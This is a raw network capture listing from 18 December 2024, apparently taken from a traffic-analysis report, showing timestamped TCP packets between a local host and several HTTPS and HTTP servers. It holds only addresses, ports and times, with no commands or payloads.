                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.838967085 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.839083910 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.839117050 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.839169979 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.840426922 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.842319012 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.842386961 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.842408895 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.848185062 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.848253965 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.848275900 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.856509924 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.856606007 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.856626987 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.896476984 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.958101988 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.008474112 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.008507967 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.033492088 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.033560991 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.033586979 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.041579008 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.041666031 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.041683912 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.049597025 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.049674988 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.049698114 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.057651043 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.057738066 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.057750940 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.057830095 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.057961941 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.057981968 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.060400963 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.060430050 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.060523987 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.060718060 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:00.060733080 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.271331072 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.271707058 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.271728992 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.272208929 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.272573948 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.272667885 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.272736073 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.312495947 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.312520981 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.717757940 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.717936039 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.718153954 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.718728065 CET49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:01.718751907 CET44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:02.442996025 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:06.918503046 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:07.742309093 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:07.742347956 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:07.742425919 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:07.742705107 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:07.742719889 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.005376101 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.005767107 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.005780935 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006057978 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006441116 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006493092 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006623983 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006798029 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006827116 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006890059 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006894112 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006928921 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006946087 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.006982088 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.631966114 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.632173061 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.632257938 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.632276058 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.633579969 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.633651018 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.633657932 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.635406971 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.635485888 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.635561943 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.635575056 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.638092041 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.638140917 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.638231993 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.638444901 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.638458967 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.183999062 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184048891 CET44349731104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184123039 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184361935 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184433937 CET44349732104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184506893 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184664011 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184675932 CET44349731104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184885025 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.184921026 CET44349732104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.866698980 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.867158890 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.867182016 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.867460012 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.868103027 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.868103027 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.868115902 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.868155956 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.915656090 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.326308012 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.326386929 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.326446056 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.327287912 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.327303886 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.405311108 CET44349732104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.405693054 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.405730963 CET44349732104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.406773090 CET44349732104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.406888008 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.406891108 CET44349731104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407250881 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407260895 CET44349731104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407825947 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407861948 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407912970 CET44349732104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407919884 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.407969952 CET49732443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.408250093 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.408304930 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.408390045 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.408651114 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.408665895 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411046982 CET44349731104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411123991 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411401033 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411447048 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411447048 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411586046 CET44349731104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411658049 CET49731443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411705971 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411768913 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411839962 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.411999941 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:11.412034035 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.626890898 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.627201080 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.627221107 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.628248930 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.628325939 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.629395962 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.629468918 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.629614115 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.629623890 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.630661964 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.630863905 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.630894899 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.631937027 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.632016897 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.632922888 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.633138895 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.672538996 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.672549009 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.672573090 CET44349734104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:12.719547033 CET49734443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.260977983 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.261647940 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.261723995 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.261744976 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.262963057 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.263062000 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.263077021 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.269221067 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.269311905 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.269320011 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.277580023 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.277687073 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.277693033 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.327650070 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.327660084 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.375531912 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.380950928 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.423540115 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.423547029 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.454580069 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.454690933 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.454715967 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.463334084 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.463417053 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.463426113 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.469881058 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.469942093 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.469952106 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.486365080 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.486475945 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.486485004 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.494707108 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.494796038 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.494805098 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.503113031 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.503181934 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.503189087 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.511512995 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.511616945 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.511624098 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.520169020 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.520260096 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.520268917 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.526638031 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.526709080 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.526716948 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.533087969 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.533159971 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.533169031 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.545810938 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.545892954 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.545900106 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.598568916 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.652676105 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.654244900 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.654311895 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.654321909 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.658957958 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.659113884 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.659121990 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.663851976 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.663923025 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.663930893 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.673322916 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.673397064 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.673408031 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.673551083 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.681852102 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.681870937 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.681926966 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.690753937 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.690820932 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.690829039 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.690879107 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.695694923 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.695714951 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.695777893 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.705275059 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.705281973 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.705342054 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.715368032 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.715451002 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.719527960 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.719604969 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.722173929 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.722240925 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.731121063 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.731204987 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.739496946 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.739573002 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.748610020 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.748704910 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.757287979 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.757373095 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.762088060 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.762187004 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.845947027 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.846060038 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.852758884 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.852890015 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.856764078 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.856837988 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.863601923 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.863679886 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.869808912 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.869885921 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.876199007 CET44349733104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.876260996 CET49733443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:13.879729033 CET44349733104.21.32.225192.168.2.16
